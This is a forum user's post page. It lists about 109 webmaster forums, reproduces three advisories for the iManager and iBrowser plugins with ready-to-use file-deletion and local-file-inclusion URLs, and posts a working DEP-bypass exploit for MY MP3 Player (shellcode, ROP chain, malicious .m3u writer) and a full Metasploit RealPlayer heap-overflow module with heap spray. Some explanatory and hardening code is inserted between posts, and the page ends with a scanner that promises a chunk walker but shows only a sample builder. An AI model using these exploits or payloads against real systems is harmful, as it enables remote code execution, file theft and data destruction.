Gonzalez

Posts posted by Gonzalez

  1. These were checked a few months ago:

    1. http://forums.digitalpoint.com 
    2. http://www.vuju.com/
    3. http://checkthisup.com
    4. http://www.sitepoint.com/forums
    5. http://www.thewebmasterforum.net
    6. http://www.webmasterforums.com
    7. http://www.allcoolforum.com
    8. http://www.warriorforum.com
    9. http://forums.webicy.com
    10. http://thehyipforum.com
    11. http://www.webmasterforumsonline.com
    12. http://www.webmasters.am/forum
    13. http://www.webmasterforums.net
    14. http://www.devhunters.com
    15. http://www.webmaster-forum.net
    16. http://www.geekvillage.com/forums
    17. http://www.zymic.com/forum
    18. http://www.webmastershelp.com
    19. http://www.webmasterdesk.org
    20. http://www.webmasterground.com
    21. http://developers.evrsoft.com/forum
    22. http://www.websitebabble.com
    23. http://www.elancetalk.com
    24. http://www.talkingcity.com
    25. http://www.australianwebmaster.com
    26. http://www.wtricks.com
    27. http://www.forums.webzonetalk.com
    28. http://www.htmlforums.com
    29. http://www.searchbliss.com/forum
    30. http://www.webmasterize.com
    31. http://www.webmasterserve.com
    32. http://www.freehostforum.com
    33. http://www.seorefugee.com/forums
    34. http://www.cre8asiteforums.com/forums
    35. http://forums.seo.ph
    36. http://forums.delphiforums.com
    37. http://www.web-mastery.net
    38. http://www.webworkshop.net/seoforum/index.php
    39. http://www.webproworld.com
    40. http://www.bzimage.org
    41. http://www.v7n.com/forums
    42. http://www.dnforum.com
    43. http://www.webcosmoforums.com
    44. http://forums.webicy.com
    45. http://forum.hittail.com/phpbb2/index.php
    46. http://www.affiliateseeking.com/forums
    47. http://siteownersforums.com/index.php
    48. http://www.webmaster-forums.net
    49. http://www.geekpoint.net
    50. http://www.smallbusinessforums.org
    51. http://forums.ukwebmasterworld.com
    52. http://www.experienceadvertising.com/forum
    53. http://opensourcephoto.net/forum
    54. http://forums.seochat.com
    55. http://forums.searchenginewatch.com
    56. http://www.ihelpyou.com/forums
    57. http://dishnews.medianetwork.co.in/yabb2/YaBB.pl
    58. http://www.businesss-forum.com
    59. http://www.9mb.com
    60. http://acapella.harmony-central.com/forums
    61. http://forums.seroundtable.com
    62. http://www.submitexpress.com/bbs
    63. http://www.startups.co.uk/6678842908...04/forums.html
    64. http://www.webmaster-talk.com
    65. http://forums.comicbookresources.com
    66. http://www.clicks.ws/forum/index.php
    67. http://www.acorndomains.co.uk
    68. http://forums.onlinebookclub.org
    69. http://www.ableton.com/forum
    70. http://www.davidcastle.org/BB
    71. http://www.webtalkforums.com
    72. http://www.bloggapedia.com/forum
    73. http://www.bloggertalk.com/forum.php
    74. http://paymentprocessing.cc
    75. http://www.directoryjunction.com/forums
    76. http://www.internetmarketingforums.net
    77. http://www.lex224.com/forums/index.php
    78. http://forum.joomla.org
    79. http://forum.mambo-foundation.org/index.php
    80. http://www.simplemachines.org/community/index.php
    81. http://www.namepros.com/index.php
    82. http://loanofficerforum.com/forum
    83. http://iq69.com/forums
    84. http://forum.hot4s.com.au
    85. http://forums.mysql.com
    86. http://forums.amd.com/forum
    87. http://softwarecommunity.intel.com/i...y/en-us/Forums
    88. http://forums.cnet.com
    89. http://seotalk.medianetwork.co.in
    90. https://www.computerbb.org
    91. http://forum.vbulletinsetup.com
    92. http://www.irishwebmasterforum.com
    93. http://www.app-developers.com
    94. http://forums.stuffdaily.com
    95. http://forums.seo.com
    96. http://www.webdigity.com
    97. http://www.inboundlinksforum.com
    98. http://forums.gentoo.org
    99. http://ubuntuforums.org
    100. http://forum.textpattern.com
    101. http://talk.iwebtool.com
    102. http://www.frogengine.com/forum
    103. http://www.capitaltheory.com
    104. http://www.smsbucket.com/forums/
    105. http://www.seoin.info
    106. http://vidberry.com
    107. http://www.teamaguilar.com/forum/
    108. http://www.discuss4fun.com
    109. http://www.fightagainstrecession.com

  2. iManager Plugin v1.2.8 (d) Remote Arbitrary File Deletion Vulnerability

    Vendor: net4visions.com
    Product web page: http://www.net4visions.com
    Affected version: <= 1.2.8 Build 02012008

    Summary: With iManager you can manage your files/images on your webserver,
    and it provides user interface to most of the phpThumb() functions. It works
    either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,
    htmlAREA, Xinha and FCKeditor.

    Desc: Input passed to the 'd' parameter in /scripts/phpCrop/crop.php is not
    properly sanitised before being used to delete files. This can be exploited
    to delete files with the permissions of the web server via directory traversal
    sequences passed within the 'd' parameter.


    ======================================================================
    /scripts/phpCrop/crop.php:
    ----------------------------------------------------------------------

    32: if( isset($_REQUEST['s']) ) {
    33:     //delete previous temp files
    34:     $matches = glob($d . '{*.jpg,*.JPG}', GLOB_BRACE);
    35:     if ( is_array ( $matches ) ) {
    36:         foreach ( $matches as $fn) {
    37:             @unlink($fn);
    38:         }
    39:     }

    ======================================================================


    Tested on: Microsoft Windows XP Professional SP3 (EN)
    Apache 2.2.14 (Win32)
    PHP 5.3.1
    MySQL 5.1.41


    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    liquidworm gmail com


    Advisory ID: ZSL-2011-5043
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5043.php


    15.09.2011

    --


    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/phpCrop/crop.php?s=1&d=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2ftest.txt%00

  3. iManager Plugin v1.2.8 (lang) Local File Inclusion Vulnerability


    Vendor: net4visions.com
    Product web page: http://www.net4visions.com
    Affected version: <= 1.2.8 Build 02012008

    Summary: With iManager you can manage your files/images on your webserver,
    and it provides user interface to most of the phpThumb() functions. It works
    either stand-alone or as a plugin to WYSIWYG editors like tinyMCE, SPAW,
    htmlAREA, Xinha and FCKeditor.

    Desc: iManager suffers from a file inclusion vulnerability (LFI) / file
    disclosure vulnerability (FD) when input passed through the 'lang' parameter
    to imanager.php, rfiles.php, symbols.php, colorpicker.php, loadmsg.php,
    ov_rfiles.php and examples.php is not properly verified before being used
    to include files. This can be exploited to include files from local resources
    with directory traversal attacks and URL encoded NULL bytes.


    ======================================================================
    /langs/lang.class.php:
    ----------------------------------------------------------------------

    67: function loadData() {
    68:     global $cfg;
    69:     include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
    70:     $this -> charset = $lang_charset;
    71:     $this -> dir = $lang_direction;
    72:     $this -> lang_data = $lang_data;
    73:     unset( $lang_data );
    74:     include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
    75:     $this -> default_lang_data = $lang_data;
    76: }

    ======================================================================


    Tested on: Microsoft Windows XP Professional SP3 (EN)
    Apache 2.2.14 (Win32)
    PHP 5.3.1
    MySQL 5.1.41


    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    liquidworm gmail com


    Advisory ID: ZSL-2011-5042
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5042.php


    15.09.2011

    --

    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/imanager.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/colorpicker.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/ov_rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/imanager/images/examples/examples.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00

  4. iBrowser Plugin v1.4.1 (lang) Local File Inclusion Vulnerability


    Vendor: net4visions.com
    Product web page: http://www.net4visions.com
    Affected version: <= 1.4.1 Build 10182009

    Summary: iBrowser is an image browser plugin for WYSIWYG editors like
    tinyMCE, SPAW, htmlAREA, Xinha and FCKeditor developed by net4visions.
    It allows image browsing, resizing on upload, directory management and
    more with the integration of the phpThumb image library.

    Desc: iBrowser suffers from a file inclusion vulnerability (LFI) / file
    disclosure vulnerability (FD) when input passed through the 'lang' parameter
    to ibrowser.php, loadmsg.php, rfiles.php and symbols.php is not properly
    verified before being used to include files. This can be exploited to
    include files from local resources with directory traversal attacks and
    URL encoded NULL bytes.


    ======================================================================
    /langs/lang.class.php:
    ----------------------------------------------------------------------

    67: function loadData() {
    68:     global $cfg;
    69:     include( dirname(__FILE__) . '/' . $this -> lang.'.php' );
    70:     $this -> charset = $lang_charset;
    71:     $this -> dir = $lang_direction;
    72:     $this -> lang_data = $lang_data;
    73:     unset( $lang_data );
    74:     include( dirname(__FILE__) . '/' . $cfg['lang'].'.php' );
    75:     $this -> default_lang_data = $lang_data;
    76: }

    ======================================================================


    Tested on: Microsoft Windows XP Professional SP3 (EN)
    Apache 2.2.14 (Win32)
    PHP 5.3.1
    MySQL 5.1.41


    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    liquidworm gmail com


    Advisory ID: ZSL-2011-5041
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5041.php


    15.09.2011

    --

    http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/ibrowser.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/loadmsg.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/rfiles.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
    http://[SOME_CMS]/jscripts/tiny_mce/plugins/ibrowser/scripts/symbols.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00
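    The three net4visions advisories above share one root cause: a request parameter ('d' in crop.php, 'lang' in lang.class.php) is concatenated into a filesystem path, traversal sequences are not rejected, and on the PHP builds of the day a URL-encoded NULL byte truncated the path so that the appended '.php' (or the '{*.jpg,*.JPG}' glob suffix) fell away. The following Python is an added illustration, not code from the advisories or from net4visions: it reproduces the truncation the attacker relied on and shows the two checks the PHP should have made (an allow-list on the value plus confinement of the resolved path to the intended directory). The directory names and the language-code pattern are assumptions for the example.

```python
import os
import re
from urllib.parse import unquote

# Assumed shape of a legitimate language file name ("en", "de", "pt_BR", ...).
# iManager/iBrowser ship langs/<code>.php; the exact code list is not on the page.
LANG_CODE = re.compile(r"^[a-z]{2}(?:[-_][A-Za-z]{2})?$")


def legacy_php_include_target(lang_dir: str, lang: str) -> str:
    """Path that pre-5.3.4 PHP actually opened for include($dir.'/'.$lang.'.php').

    The C runtime stopped at the first NUL, so everything the code appended
    after the attacker's %00 (here the forced '.php' suffix) was discarded.
    """
    full = f"{lang_dir}/{lang}.php"
    return full.split("\x00", 1)[0]


def confine(base_dir: str, untrusted: str) -> str:
    """Resolve base_dir/untrusted and insist the result stays under base_dir."""
    if "\x00" in untrusted:
        raise ValueError("NUL byte in path component")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, untrusted))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:          # different drives/roots on some platforms
        inside = False
    if not inside:
        raise ValueError(f"{untrusted!r} escapes {base_dir}")
    return target


def safe_lang_file(lang_dir: str, lang: str) -> str:
    """Hardened replacement for lang.class.php's include: allow-list, then confine."""
    if "\x00" in lang or not LANG_CODE.match(lang):
        raise ValueError(f"{lang!r} is not a language code")
    return confine(lang_dir, lang + ".php")


def safe_temp_dir(tmp_dir: str, d: str) -> str:
    """Hardened replacement for crop.php: 'd' may only name a directory under tmp_dir,
    so glob(d . '{*.jpg,*.JPG}') can never reach outside it."""
    return confine(tmp_dir, d)


def is_accepted(check, base_dir: str, value: str) -> bool:
    """True when `check` accepts the raw (URL-decoded) parameter value."""
    try:
        check(base_dir, unquote(value))
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    lfi = "..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%00"   # from the advisory
    print("legacy PHP opened:", legacy_php_include_target("/var/www/langs", unquote(lfi)))
    print("hardened accepts 'en':", is_accepted(safe_lang_file, "/var/www/langs", "en"))
    print("hardened accepts LFI :", is_accepted(safe_lang_file, "/var/www/langs", lfi))
```

The allow-list alone defeats both advisories' payloads; the `confine` step is kept as a second layer because an allow-list tends to get loosened later, and the realpath comparison still holds then.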

  5. # written to bypass OptIn/OptOut DEP policy
    # tested on windows xp sp3 running in virtualbox
    # payload is assembled from byte strings and written in binary mode

    print("\n============================")
    print(" MY MP3 Player DEP Bypass ")
    print(" Bypass OptIn/OptOut Policy ")
    print(" Tested on Windows XP SP3 ")
    print(" Written by Blake ")
    print("============================\n")

    # calc.exe - 1014 bytes of space for shellcode
    shellcode = (
        b"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
        b"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
        b"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
        b"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
        b"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44"
        b"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47"
        b"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38"
        b"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48"
        b"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c"
        b"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"
        b"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58"
        b"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44"
        b"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38"
        b"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
        b"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47"
        b"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a"
        b"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b"
        b"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53"
        b"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57"
        b"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39"
        b"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46"
        b"\x4e\x46\x43\x36\x42\x50\x5a"
    )

    buffer = b"\x41" * 1024          # filler up to the saved return address
    eip = b"\x99\x13\x09\x5d"        # RETN - COMCTL32
    rop = b"\x42" * 4                # junk to compensate
    rop += b"\x8c\x39\x09\x5d"       # POP EBX, RETN - COMCTL32
    rop += b"\xff\xff\xff\xff"       # EBX = 0xFFFFFFFF
    rop += b"\x28\x90\x12\x77"       # INC EBX, RETN - OLEAUT32 (EBX = 0 = dwFlags for SetProcessDEPPolicy)
    rop += b"\x44\x94\x12\x77"       # POP EBP, RETN - OLEAUT32
    rop += b"\xa4\x22\x86\x7c"       # SetProcessDEPPolicy
    rop += b"\x36\x1c\x12\x77"       # POP EDI, RETN - OLEAUT32
    rop += b"\x37\x1c\x12\x77"       # RETN - OLEAUT32
    rop += b"\xd4\x1a\x12\x77"       # POP ESI, RETN - OLEAUT32
    rop += b"\x37\x1c\x12\x77"       # RETN - OLEAUT32
    rop += b"\xf7\x8c\x14\x77"       # PUSHAD, RETN - OLEAUT32 (EDI, ESI, EBP become the next return addresses)
    nops = b"\x90" * 20
    junk = b"\x42" * (2000 - len(nops + shellcode + rop))

    print("[+] Creating malicious .m3u file")
    try:
        # binary mode: a text-mode handle on Windows would rewrite 0x0a bytes
        with open("exploit.m3u", "wb") as f:
            f.write(buffer + eip + rop + nops + shellcode + junk)
        print("[+] File created")
    except IOError:
        print("[x] Could not create file")

    input("\nPress any key to exit...\n")
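    The chain above is the classic PUSHAD trick for SetProcessDEPPolicy: registers are loaded with the function address and two RETN gadgets, PUSHAD dumps them onto the stack in one instruction, and the saved ESP that PUSHAD pushes becomes the return address into the NOP sled. The following simulator is an added example, not part of Blake's exploit: it walks the exploit's own gadget addresses the way the CPU would and reports what SetProcessDEPPolicy receives. It assumes, as the exploit's "junk to compensate" comment implies, that execution resumes at the first gadget address after the four junk bytes, and it starts EAX/ECX/EDX at zero since their values are irrelevant to the chain.

```python
import struct

# Gadget addresses copied from the exploit above (XP SP3, COMCTL32/OLEAUT32/kernel32);
# the leading 4 junk bytes are omitted because the simulation starts after them.
ROP_CHAIN = (
    b"\x8c\x39\x09\x5d"  # POP EBX, RETN
    b"\xff\xff\xff\xff"  #   -> EBX = 0xFFFFFFFF
    b"\x28\x90\x12\x77"  # INC EBX, RETN        -> EBX = 0 (dwFlags: disable DEP)
    b"\x44\x94\x12\x77"  # POP EBP, RETN
    b"\xa4\x22\x86\x7c"  #   -> EBP = SetProcessDEPPolicy
    b"\x36\x1c\x12\x77"  # POP EDI, RETN
    b"\x37\x1c\x12\x77"  #   -> EDI = RETN
    b"\xd4\x1a\x12\x77"  # POP ESI, RETN
    b"\x37\x1c\x12\x77"  #   -> ESI = RETN
    b"\xf7\x8c\x14\x77"  # PUSHAD, RETN
)
NOPS = b"\x90" * 20
SETPROCESSDEPPOLICY = 0x7C8622A4

GADGETS = {
    0x5D09398C: ("pop", "ebx"),
    0x77129028: ("inc", "ebx"),
    0x77129444: ("pop", "ebp"),
    0x77121C36: ("pop", "edi"),
    0x77121C37: ("ret",),
    0x77121AD4: ("pop", "esi"),
    0x77148CF7: ("pushad",),
}


def run_chain(chain: bytes = ROP_CHAIN, nops: bytes = NOPS, max_steps: int = 64) -> dict:
    """Execute the chain against a model stack (chain followed by the NOP sled).

    Returns the dwFlags argument SetProcessDEPPolicy would see, the stack offset
    it returns into, and the byte found there (0x90 means the sled was hit).
    """
    mem = bytearray(chain + nops)
    esp = 0
    regs = {"eax": 0, "ecx": 0, "edx": 0, "ebx": 0, "ebp": 0, "esi": 0, "edi": 0}

    def pop() -> int:
        nonlocal esp
        value = struct.unpack_from("<I", mem, esp)[0]
        esp += 4
        return value

    def push(value: int) -> None:
        nonlocal esp
        esp -= 4
        struct.pack_into("<I", mem, esp, value & 0xFFFFFFFF)

    eip = pop()  # address fetched by the RETN that the overwritten EIP pointed at
    for _ in range(max_steps):
        if eip == SETPROCESSDEPPOLICY:
            # Reached by RETN, not CALL: [esp] is the return address (the ESP that
            # PUSHAD saved), [esp+4] is the first argument (the EBX that PUSHAD saved).
            return_to = pop()
            dw_flags = pop()
            return {"dwFlags": dw_flags, "return_to": return_to, "landing_byte": mem[return_to]}
        op = GADGETS[eip]
        if op[0] == "pop":
            regs[op[1]] = pop()
        elif op[0] == "inc":
            regs[op[1]] = (regs[op[1]] + 1) & 0xFFFFFFFF
        elif op[0] == "pushad":
            # PUSHAD order: EAX, ECX, EDX, EBX, original ESP, EBP, ESI, EDI (EDI ends on top)
            saved_esp = esp
            for r in ("eax", "ecx", "edx", "ebx"):
                push(regs[r])
            push(saved_esp)
            for r in ("ebp", "esi", "edi"):
                push(regs[r])
        eip = pop()  # every gadget ends in RETN
    raise RuntimeError("chain never reached SetProcessDEPPolicy")


if __name__ == "__main__":
    result = run_chain()
    print(f"SetProcessDEPPolicy(dwFlags={result['dwFlags']:#x})")
    print(f"returns to stack offset {result['return_to']} (byte {result['landing_byte']:#04x})")
```

After PUSHAD the top of the stack reads EDI, ESI, EBP, saved ESP, EBX: the two RETNs in EDI and ESI are consumed first, the call lands in SetProcessDEPPolicy with saved ESP as its return address and EBX (0) as dwFlags, and on return the CPU steps straight into the NOP sled that follows the chain.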

  6. ##
    # $Id: realplayer_qcp.rb 13745 2011-09-17 06:48:33Z sinn3r $
    ##

    ##
    # This file is part of the Metasploit Framework and may be subject to
    # redistribution and commercial restrictions. Please see the Metasploit
    # Framework web site for more information on licensing and terms of use.
    # http://metasploit.com/framework/
    ##

    require 'msf/core'

    class Metasploit3 < Msf::Exploit::Remote
      Rank = AverageRanking

      include Msf::Exploit::Remote::HttpServer::HTML

      def initialize(info={})
        super(update_info(info,
          'Name'           => "RealNetworks Realplayer QCP Parsing Heap Overflow",
          'Description'    => %q{
              This module exploits a heap overflow in Realplayer when handling a .QCP file.
            The specific flaw exists within qcpfformat.dll. A static 256 byte buffer is
            allocated on the heap and user-supplied data from the file is copied within a
            memory copy loop.

            This allows a remote attacker to execute arbitrary code running in the context
            of the web browser via a .QCP file with a specially crafted "fmt" chunk.
            At this moment this module exploits the flaw on Windows XP IE6, IE7.
          },
          'License'        => MSF_LICENSE,
          'Version'        => "$Revision: 13745 $",
          'Author'         =>
            [
              'Sean de Regge',  # Vulnerability discovery
              'juan vazquez'    # Metasploit module
            ],
          'References'     =>
            [
              ['CVE', '2011-2950'],
              ['OSVDB', '74549'],
              ['BID', '49172'],
              # ZDI advisory
              ['URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-265/'],
              # Vendor advisory
              ['URL', 'http://service.real.com/realplayer/security/08162011_player/en/'],
              # Fix commit
              ['URL', 'http://lists.helixcommunity.org/pipermail/datatype-cvs/2011-April/015469.html'],
            ],
          'Payload'        =>
            {
              'Space' => 1024
            },
          'DefaultOptions' =>
            {
              'ExitFunction'         => "process",
              'InitialAutoRunScript' => 'migrate -f'
            },
          'Platform'       => 'win',
          'Targets'        =>
            [
              [ 'Automatic', {} ],
              [ 'Internet Explorer 6 on XP SP3', { 'Nops' => "%u1414%u1414" } ],
              [ 'Internet Explorer 7 on XP SP3', { 'Nops' => "%u0c0c%u0c0c" } ],
            ],
          'DisclosureDate' => "Aug 16 2011",
          'DefaultTarget'  => 0))

        register_options(
          [
            OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation'])
          ], self.class)
      end

      def get_target(cli, request)
        # Default target
        my_target = target

        vprint_status("User-Agent: #{request.headers['User-Agent']}")

        if target.name == 'Automatic'
          agent = request.headers['User-Agent']
          if agent =~ /NT 5\.1/ and agent =~ /MSIE 6\.0/
            # Windows XP + IE 6
            my_target = targets[1]
          elsif agent =~ /NT 5\.1/ and agent =~ /MSIE 7\.0/
            # Windows XP + IE 7.0
            my_target = targets[2]
          elsif agent =~ /RMA/
            # RealPlayer identifies itself as "RMA/1.0 (compatible; RealMedia)"
            # when requesting our trigger file
            return 'RMA'
          else
            # If we don't recognize the client, we don't fire the exploit
            my_target = nil
          end
        end

        return my_target
      end

      def exploit
        # Set trigger file name
        @filename = rand_text_alpha(rand(6) + 3)
        # Create the trigger file
        @trigger = build_trigger
        super
      end

      def on_request_uri(cli, request)
        # Pick the right target
        vprint_status("Selecting target...")
        my_target = get_target(cli, request)
        if my_target.nil?
          print_error("Target not supported")
          send_not_found(cli)
          return
        end

        vprint_status("URL: #{request.uri.to_s}")

        # Send the trigger file upon request
        if request.uri.match(/\.qcp$/)
          print_status("Sending trigger file to #{cli.peerhost}:#{cli.peerport}")
          send_response(cli, @trigger, { 'Content-Type' => 'application/octet-stream' })
          return
        end

        vprint_status("Building shellcode...")
        code = Rex::Text.to_unescape(payload.encoded)

        vprint_status("Building spray...")
        spray = build_spray(my_target, code)

        # Obfuscate on demand
        vprint_status("Obfuscating javascript...")
        if datastore['OBFUSCATE']
          spray = Rex::Exploitation::JSObfu.new(spray)
          spray.obfuscate
        end

        vprint_status("Building html...")
        # Value for the 'Src' parameter of our ActiveX control: drop one trailing
        # slash from the resource so the path separator is not doubled
        trigger_file = get_resource.chomp("/") + "/#{@filename}.qcp"

        html = <<-EOS
    <HTML>
    <HEAD>
    </HEAD>
    <BODY>
    <script language='javascript'>
    #{spray}
    </script>
    <OBJECT ID=RVOCX CLASSID="clsid:CFCDAA03-8BE4-11cf-B84B-0020AFBBCCFA" WIDTH=320 HEIGHT=240>
    <PARAM NAME="SRC" VALUE="#{trigger_file}">
    <PARAM NAME="CONTROLS" VALUE="ImageWindow">
    <PARAM NAME="CONSOLE" VALUE="one">
    <PARAM NAME="AUTOSTART" VALUE="true">
    <EMBED SRC="#{trigger_file}" WIDTH=320 HEIGHT=240 NOJAVA=true CONTROLS=ImageWindow CONSOLE=one AUTOSTART=true>
    </OBJECT>
    </BODY>
    </HTML>
        EOS

        print_status("Sending malicious page to #{cli.peerhost}:#{cli.peerport}...")
        send_response( cli, html, {'Content-Type' => 'text/html'} )
      end

      def build_trigger()
        overflow_size   = 700
        overflow_string = "\x11" * overflow_size

        # riff_mark
        trigger = "\x52\x49\x46\x46"
        # total_size
        trigger << [0xed44 + overflow_size].pack("V")
        # qlcm_tag
        trigger << "\x51\x4c\x43\x4d"
        # fmt_tag
        trigger << "\x66\x6d\x74\x20"
        # fmt_size (0x96 is the regular chunk size; the extra bytes overflow the heap buffer)
        trigger << [0x96 + overflow_size].pack("V")
        # fmt_content
        trigger << "\x01\x00\x8d\xd4\x89\xe6\x76\x90"
        trigger << "\xb5\x46\x91\xef\x73\x6a\x51\x00"
        trigger << "\xce\xb4\x01\x00\x54\x49\x41\x20"
        trigger << "\x49\x53\x2d\x31\x32\x37\x20\x45"
        trigger << "\x6e\x68\x61\x6e\x63\x65\x64\x20"
        trigger << "\x56\x61\x72\x69\x61\x62\x6c\x65"
        trigger << "\x20\x52\x61\x74\x65\x20\x43\x6f"
        trigger << "\x64\x65\x63\x2c\x20\x53\x70\x65"
        trigger << "\x65\x63\x68\x20\x53\x65\x72\x76"
        trigger << "\x69\x63\x65\x20\x4f\x70\x74\x69"
        trigger << "\x6f\x6e\x20\x33\x20\x00\x00\x00"
        trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
        trigger << "\x00\x00\x00\x00\xc8\x32\x16\x00"
        trigger << "\xa0\x00\x40\x1f\x10\x00\x05\x00"
        trigger << "\x00\x00\x16\x04\x0a\x03\x05\x02"
        trigger << "\x02\x01\x00\x00\x00\x00\x00\x00"
        trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
        trigger << "\x00\x00\x00\x00\x00\x00\x00\x00"
        trigger << "\x00\x00\x00\x00\x00\x00"
        trigger << overflow_string
        # vrat_tag
        trigger << "\x76\x72\x61\x74"
        # vrat_size
        trigger << [0x8].pack("V")
        # vrat_content
        trigger << "\x01\x00\x00\x00\x06\x13\x00\x00"
        # data_tag
        trigger << "\x64\x61\x74\x61"
        # data_size
        trigger << [0xec8a].pack("V")
        # data_content
        trigger << rand_text_alpha(0xec8a)
        return trigger
      end

      def build_spray(mytarget, code)
        spray = <<-JS
        var heap_obj = new heapLib.ie(0x20000);

        var code = unescape("#{code}");
        var nops = unescape("#{mytarget['Nops']}");

        while (nops.length < 0x10000) nops += nops;
        offset = nops.substring(0, 0x7BE0);
        var shellcode = offset + code + nops.substring(0, 0x8000-offset.length-code.length);

        while (shellcode.length < 0x20000) shellcode += shellcode;
        block = shellcode.substring(0, (0x10000-6)/2);

        heap_obj.gc();

        for (var i=0; i < 0x1400; i++) {
          heap_obj.alloc(block);
        }
        JS

        spray = heaplib(spray)
        return spray
      end

    end
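    The module's build_trigger shows the bug from the attacker's side: a RIFF/QLCM container whose 'fmt ' chunk declares 0x96 + 700 bytes while qcpfformat.dll copies it into a fixed 256-byte heap allocation. The Python below is an added example, not code from the Metasploit module or from RealNetworks: a small chunk walker that a file scanner or mail gateway could use to flag such a file before a player opens it. The builder only exists to construct sample input inline; its fmt bytes are placeholders rather than the codec descriptor from the module, and 0x96 is taken from the module as the size of a well-formed 'fmt ' chunk.

```python
import struct

FMT_SPEC_SIZE = 0x96      # size the module uses for a regular 'fmt ' chunk
HEAP_BUFFER_SIZE = 256    # fixed heap allocation named in the module description


def build_qcp(fmt_extra: int = 0, data_size: int = 32) -> bytes:
    """Constructed sample laid out like build_trigger: RIFF size, QLCM, fmt/vrat/data.

    fmt_extra=0 yields a spec-sized 'fmt ' chunk; fmt_extra=700 mirrors the module.
    """
    fmt = b"\x01\x00" + b"\x00" * (FMT_SPEC_SIZE - 2) + b"\x11" * fmt_extra  # placeholder descriptor
    vrat = b"\x01\x00\x00\x00\x06\x13\x00\x00"
    data = b"A" * data_size
    chunks = b""
    for tag, body in ((b"fmt ", fmt), (b"vrat", vrat), (b"data", data)):
        chunks += tag + struct.pack("<I", len(body)) + body
        if len(body) & 1:                     # RIFF pads odd-sized chunks to even
            chunks += b"\x00"
    form = b"QLCM" + chunks
    return b"RIFF" + struct.pack("<I", len(form)) + form


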